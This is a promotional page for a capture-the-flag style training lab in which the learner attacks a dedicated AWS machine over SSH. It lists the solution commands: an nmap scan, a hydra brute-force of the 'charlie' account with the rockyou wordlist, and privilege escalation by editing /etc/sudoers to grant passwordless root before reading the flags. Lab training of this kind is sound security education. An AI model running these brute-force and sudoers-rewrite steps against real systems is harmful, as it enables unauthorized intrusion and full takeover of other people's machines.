Step into the shoes of a penetration tester and tackle this realistic SSH-based challenge. This server might look secure from the outside, but weak credentials and dangerous sudo configurations could be your ticket to complete system compromise. 🎯 Master the art of reconnaissance, brute-force attacks, and privilege escalation in this hands-on Linux exploitation scenario.
Launch your dedicated AWS machine to begin hacking
nmap -sS -sV -Pn <target-ip>ssh <target-ip>hydra -l charlie -P /usr/share/wordlists/rockyou.txt <target-ip> sshssh charlie@<target-ip>sudo -lcat /home/charlie/flag-user.txtsudoedit /etc/sudoerscharlie ALL=(ALL) NOPASSWD:ALLsudo su -cat /root/flag-root.txtEnter your email to continue
Choose a username to get started
We've sent a 9-character code to your email